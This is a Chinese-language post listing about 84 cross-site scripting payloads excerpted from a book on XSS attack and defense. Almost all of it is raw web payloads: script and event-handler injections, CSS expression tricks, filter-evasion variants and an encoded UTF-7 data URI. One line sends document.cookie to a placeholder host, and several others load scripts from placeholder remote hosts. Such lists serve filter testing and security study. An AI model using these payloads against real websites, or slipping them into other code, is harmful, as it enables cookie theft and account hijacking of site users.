摘录于《XSS跨站脚本攻击剖析与防御》,希望大家支持正版,写的还是不错的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84
| <script>alert(1);</script> <script>alert('xss');</script> <script src="xxx://xxx.xxx"></script> <script>location.href="xxx://xxx.xx/cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('xss');</scr<script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=xx.png onerror=alert(/xss/) /> <style>@im\port'\ja\vasc\ript:alert(\"xss\");</style> <?echo('<scr)';echo('ipt>alert(\"xss\")</script>');?> <marquee><script>alert('xss')</script></marquee> <IMG SRC=\"jav	ascript:alert('xss');\"> <IMG SRC=\"jav
ascript:alert('xss');\"> <IMG SRC=\"jav
ascript:alert('xss');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "<script>alert(0)</script> <script src = xxx.xxx.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('xss')\"> <IMG OYNSRC=\"javascript:alert('xss')\"> <font style='color:expression(alert(document.cookie))'> ');alert('xss <img src="javascript:alert('xss')"> <script language="JavaScript">alert('xss')</script> [url=javascript:alert('xss');]click me[/url] <body onunload="javascript:alert('xss');"> <body onLoad="alert('xss');"> [color=red' onmouserover="alert('xss')"]mouser over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("xss"); <div style="x:expression((window.r==1)?"eval('r=1;alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?>onload=alert('xss')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>xss</h1></marquee> '">><marquee><h1>xss</h1></marquee> '">><script>alert('xss')</script> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('xss');\"> <script>var var = 1:alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('xss')")}</STYLE> <?='<SCRIPT>alert("xss")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"xss\")'> "onfocus=alert("xss")"><" <FRAMESET><FRAME SRC=\"javascript:alert('xss');\"></FRAMESET> <STYLE>li{list-style-image:url(\"javascript:alert('xss')\");}</SYTLE><UL><LI>XSS <br size=\"&{alert('xss')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert(1))> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('xss');//"> Excute(<MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(1)</script> <body onLoad="while(true) alert('xss');"> '"></title><script>alert(111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript">alert(x \nS \nS);</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('xss');"> '></script><script>alert(1)</script> <script+src=">"+src="http://xx.xx/xx.js"></script> '>"><script src = "xxx.xxx/xss.js"></script> }</style><script>a=eval;b=alert;a(b(/xss/.source));</script> <SCRIPT>document.write("xss")</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <body background=javascript:'"><script>alert(1)</script>></body> ">/XaDos/><script>alert(1)</script><script src="xxxx.xxxx/xx.js"></script> Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlenQoMTMzNyk8L3NjcmlwdD4= 上面的解密后 "></title><script>alert(1337)</script> 注意utf-7 "<marquee><img src=x.png onerror=alert(1)/> '"><marquee><img src=x.png onerror=alert(1)/> </div><script>alert(1)</script> "><iframe src='javascript:alert(1)'></iframe> <div style="background:url('javascript:alert(1)')"> <img src='java\nscript:alert(1)'> >"'><img src="javascript:alert(1)"> " style="background:url(javascript:alert(/xss/))" >"><script>alert(/xss/)</script> "></title><script>alert(1)</script> '"</title><font color=red onmouseover=javascript:alert(1)>xss</font> <SELECT NAME="" onmouerover=alert(1)></select>
|